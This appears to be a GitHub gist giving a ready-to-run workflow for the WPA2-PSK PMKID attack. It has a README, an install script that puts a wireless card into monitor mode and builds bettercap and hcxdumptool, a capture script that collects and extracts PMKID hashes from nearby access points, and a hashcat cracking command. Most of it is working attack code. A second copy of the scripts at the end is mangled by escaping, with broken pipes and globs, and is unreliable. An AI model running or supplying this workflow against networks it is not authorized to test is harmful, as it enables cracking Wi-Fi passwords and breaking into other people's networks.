jthuraisamy/0.README.md Secret

## 0.README.md

      
    Raw
  

              0.README.md
            
          
    WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200

About

This short post goes over the workflow I use for the PMKID attack using an Alfa AC1200 (AWUS036ACH) card with a bootable Kali USB and bettercap + hcxdumptool. I have noticed more results using hcxdumptool compared to wifi.assoc all in bettercap, but I still prefer to view and log the output in bettercap, so this workflow helps make the most of both tools.
There's plenty out there about this attack (see resources at bottom), so nothing particularly novel here. As always, you must only execute this workflow on networks where you have permission.
Setup


Laptop
Kali Live USB
Alfa AC1200 (AWUS036ACH)

Installation


Boot into Kali.
Connect to a network with Internet access to download packages.
Execute install.sh script.
Ensure that the card is connected when prompted.
Confirm that card is running in monitor mode with iwconfig.

Capturing Hashes


Execute capture.sh script.
When complete, enter wifi.show; wifi.recon off; q in bettercap.
When script is finished, it will list all APs where PMKIDs were captured.
Hashes will be found in the *.pmkid.txt files.
Session logs will be found in the *-session_{TOOL}.log files.

Cracking Hashes


Use hashcat with mode 16800, e.g. hashcat -m16800 hashes.txt wordlist.txt --show --force.

Resources


https://hashcat.net/forum/thread-7717.html
https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
https://medium.com/@adam.toscher/new-attack-on-wpa-wpa2-using-pmkid-96c3119f7f99


## 1.install.sh
#!/bin/bash

# Install AWUS036ACH drivers.
apt update
apt --yes install realtek-rtl88xxau-dkms

# Install Bettercap.
apt --yes install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
mkdir -p /opt/bettercap
cd /opt/bettercap
wget https://github.com/bettercap/bettercap/releases/download/v2.28/bettercap_linux_amd64_v2.28.zip
unzip bettercap_linux_amd64_v2.28.zip

# Install hcxtools.
apt update
kill `lsof /var/lib/dpkg/lock-frontend | tail -1 | awk '{print $2}'`
apt --yes install git libcurl4-openssl-dev libssl-dev zlib1g-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
git clone https://github.com/ZerBea/hcxtools.git
cd /opt/hcxdumptool
make
make install
cd /opt/hcxtools
make
make install

# Plugin AWUS036ACH.
read -p "Connect the AWUS036ACH, then press [ENTER]..."
service network-manager stop
killall wpa_supplicant
sleep 2
ip link set wlan1 down
sleep 2
iwconfig wlan1 mode monitor
sleep 2
ip link set wlan1 up

## 2.capture.sh
#!/bin/bash

mkdir -p ~/captures/
cd ~/captures/

hcxdumptool -i wlan1 -o "$(date +%Y%m%d_%H%M%S)-handshakes_hcxdumptool.pcapng" --enable_status=1 | tee "$(date +%Y%m%d_%H%M%S)-session_hcxdumptool.log" &
sleep 1
/opt/bettercap/bettercap -iface wlan1 -eval "events.ignore wifi.ap.lost; events.ignore wifi.client.probe; events.ignore wifi.client.new; set wifi.handshakes.file $(date +%Y%m%d_%H%M%S)-handshakes_bettercap.pcap; set wifi.deauth.open false; wifi.recon on" | tee "$(date +%Y%m%d_%H%M%S)-session_bettercap.log"
sleep 1
killall hcxdumptool
sleep 2

echo "Extracting PMKID hashes from PCAP files..."
for pcap_file in $(ls -1 *.pcap*); do
    hcxpcapngtool -o "$pcap_file.pmkid.txt" "$pcap_file"
done

echo "PMKIDs captured for the following APs:"
python -c "import glob, binascii, pprint; pprint.pprint(set([binascii.unhexlify(line.split('*')[-4]) for line in sum([open(hcf).read().splitlines() for hcf in glob.glob('*.pmkid.txt')], [])]))"
	#!/bin/bash

	# Install AWUS036ACH drivers.
	apt update
	apt --yes install realtek-rtl88xxau-dkms

	# Install Bettercap.
	apt --yes install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
	mkdir -p /opt/bettercap
	cd /opt/bettercap
	wget https://github.com/bettercap/bettercap/releases/download/v2.28/bettercap_linux_amd64_v2.28.zip
	unzip bettercap_linux_amd64_v2.28.zip

	# Install hcxtools.
	apt update
	kill `lsof /var/lib/dpkg/lock-frontend \| tail -1 \| awk '{print $2}'`
	apt --yes install git libcurl4-openssl-dev libssl-dev zlib1g-dev
	cd /opt
	git clone https://github.com/ZerBea/hcxdumptool.git
	git clone https://github.com/ZerBea/hcxtools.git
	cd /opt/hcxdumptool
	make
	make install
	cd /opt/hcxtools
	make
	make install

	# Plugin AWUS036ACH.
	read -p "Connect the AWUS036ACH, then press [ENTER]..."
	service network-manager stop
	killall wpa_supplicant
	sleep 2
	ip link set wlan1 down
	sleep 2
	iwconfig wlan1 mode monitor
	sleep 2
	ip link set wlan1 up
	#!/bin/bash

	mkdir -p ~/captures/
	cd ~/captures/

	hcxdumptool -i wlan1 -o "$(date +%Y%m%d_%H%M%S)-handshakes_hcxdumptool.pcapng" --enable_status=1 \| tee "$(date +%Y%m%d_%H%M%S)-session_hcxdumptool.log" &
	sleep 1
	/opt/bettercap/bettercap -iface wlan1 -eval "events.ignore wifi.ap.lost; events.ignore wifi.client.probe; events.ignore wifi.client.new; set wifi.handshakes.file $(date +%Y%m%d_%H%M%S)-handshakes_bettercap.pcap; set wifi.deauth.open false; wifi.recon on" \| tee "$(date +%Y%m%d_%H%M%S)-session_bettercap.log"
	sleep 1
	killall hcxdumptool
	sleep 2

	echo "Extracting PMKID hashes from PCAP files..."
	for pcap_file in $(ls -1 .pcap); do
	hcxpcapngtool -o "$pcap_file.pmkid.txt" "$pcap_file"
	done

	echo "PMKIDs captured for the following APs:"
	python -c "import glob, binascii, pprint; pprint.pprint(set([binascii.unhexlify(line.split('')[-4]) for line in sum([open(hcf).read().splitlines() for hcf in glob.glob('.pmkid.txt')], [])]))"